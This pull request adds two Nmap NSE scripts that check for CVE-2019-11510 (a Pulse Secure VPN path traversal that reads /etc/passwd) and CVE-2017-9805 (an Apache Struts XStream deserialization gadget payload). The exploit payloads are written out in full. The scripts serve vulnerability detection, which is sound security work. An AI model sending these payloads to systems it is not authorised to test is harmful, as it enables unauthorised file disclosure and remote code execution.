### PR TITLE
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests

### DIFF
--- a/http-pulse_ssl_vpn.nse
+++ b/http-pulse_ssl_vpn.nse
@@ -1,0 +1,76 @@
+description = [[
+Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
+This exploit reads /etc/passwd as a proof of concept
+This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+
+---
+-- @usage
+-- nmap -p <port> --script pulse_ssl_vpn <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- s4430/tcp  open  http
+-- | http-vuln-cve2019-11510:
+-- |   VULNERABLE
+-- |   Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2019-11510
+-- |
+-- |     Disclosure date: 2019-04-24
+-- |     References:
+-- |      http://www.securityfocus.com/bid/108073 
+-- |      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510
+-- |_     http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html 
+--
+-- @args http-vuln-cve2019-11510.method The HTTP method for the request. The default method is "POST".
+-- @args http-vuln-cve2019-11510.path The URL path to request. The default path is "/".
+
+author = "r00tpgp"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln" }
+
+portrule = shortport.http
+
+action = function(host, port)
+  local vuln = {
+    title = "Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests",
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
+This exploit reads /etc/passwd as a proof of concept
+This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
+    ]],
+    IDS = {
+        CVE = "CVE-2019-11510"
+    },
+    references = {
+        'http://www.securityfocus.com/bid/108073',
+	'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510',
+        'http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html'
+    },
+    dates = {
+        disclosure = { year = '2019', month = '04', day = '24' }
+    }
+  }
+
+   -- Send a simple GET request to the server, if it returns appropiate string, then you have a vuln host
+ options = {header={}}    options['header']['User-Agent'] = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"    
+ --local req = http.get(host, port, uri, options) 
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local url = stdnse.get_script_args(SCRIPT_NAME..".url") or "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
+ local response = http.generic_request(host, port, "GET", "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/", options)
+
+ if response.status == 200 and string.match(response.body, "root:x:0:0:root:/:/bin/bash")  then
+ -- if response.status == 200 then
+ vuln.state = vulns.STATE.VULN
+ end
+
+ return vuln_report:make_output(vuln)
+end

--- a/scripts/http-vuln-cve2017-9805.nse
+++ b/scripts/http-vuln-cve2017-9805.nse
@@ -1,0 +1,86 @@
+description = [[
+Detects whether the specified URL is vulnerable to the Apache Struts REST Plugin XStream
+Remote Code Execution Vulnerability (CVE-2017-9805).
+]]
+
+local http = require "http"
+local shortport = require "shortport"
+local vulns = require "vulns"
+local stdnse = require "stdnse"
+local string = require "string"
+
+---
+-- @usage
+-- nmap -p <port> --script http-vuln-cve2017-9805 <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- 80/tcp  open  http
+-- | http-vuln-cve2017-9805:
+-- |   VULNERABLE
+-- |   Apache Struts REST Plugin XStream Remote Code Execution Vulnerability
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2017-9805
+-- |
+-- |     Disclosure date: 2017-09-15
+-- |     References:
+-- |       https://cwiki.apache.org/confluence/display/WW/S2-052
+-- |       https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement
+-- |_      https://www.r00tpgp.com/2019/02/detecting-apache-struts-s2-052.html
+--
+-- @args http-vuln-cve2017-9805.method The HTTP method for the request. The default method is "POST".
+-- @args http-vuln-cve2017-9805.path The URL path to request. The default path is "/".
+
+author = "r00tpgp"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = { "vuln" }
+
+portrule = shortport.http
+
+action = function(host, port)
+  local vuln = {
+    title = "Apache Struts REST Plugin XStream RCE",
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for 
+deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads
+    ]],
+    IDS = {
+        CVE = "CVE-2017-9805"
+    },
+    references = {
+        'https://cwiki.apache.org/confluence/display/WW/S2-052',
+	'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement',
+        'https://www.r00tpgp.com/2019/02/detecting-apache-struts-s2-052.html'
+    },
+    dates = {
+        disclosure = { year = '2017', month = '09', day = '15' }
+    }
+  }
+
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+  local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST"
+  local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/"
+
+  local body = {
+   '<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is class="javax.crypto.CipherInputStream"><cipher class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter class="java.util.Collections$EmptyIterator"/><next class="java.lang.ProcessBuilder"><command><string></string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filter class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><next class="string">foo</next></serviceIterator><lock/></cipher><input class="java.lang.ProcessBuilder$NullInputStream"/><ibuffer/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/></entry></map>'
+  }
+
+   local options = {
+    header = {
+      Connection = "close",
+      ["Content-Type"] = "application/xml",
+    },
+    content = body
+  }
+
+  local response = http.generic_request(host, port, method, path, options )
+
+  if response and string.match(response.body, "org.apache.struts2.rest.handler.XStreamHandler.toObject") then
+    vuln.state = vulns.STATE.VULN
+  end
+
+  return vuln_report:make_output(vuln)
+end
+


### PR DESCRIPTION
SUMMARY
-------------
Simple NSE script to detect Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4).


INSTALLATION
------------------

$ git clone https://github.com/r00tpgp/http-pulse_ssl_vpn.nse.git
$ cd http-pulse_ssl_vpn.nse/
$ sudo cp http-pulse_ssl_vpn.nse /usr/share/nmap/scripts/

USAGE
---------

$ sudo nmap -n -p 443 --script http-pulse_ssl_vpn -n victim_host

PORT    STATE SERVICE
443/tcp open  https
| http-pulse_ssl_vpn: 
|   VULNERABLE:
|   Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests
|     State: VULNERABLE
|     IDs:  CVE:CVE-2019-11510
|       Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. 
|       This exploit reads /etc/passwd as a proof of concept
|       This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
|           
|     Disclosure date: 2019-04-24
|     References:
|       http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html
|       http://www.securityfocus.com/bid/108073
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510

Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
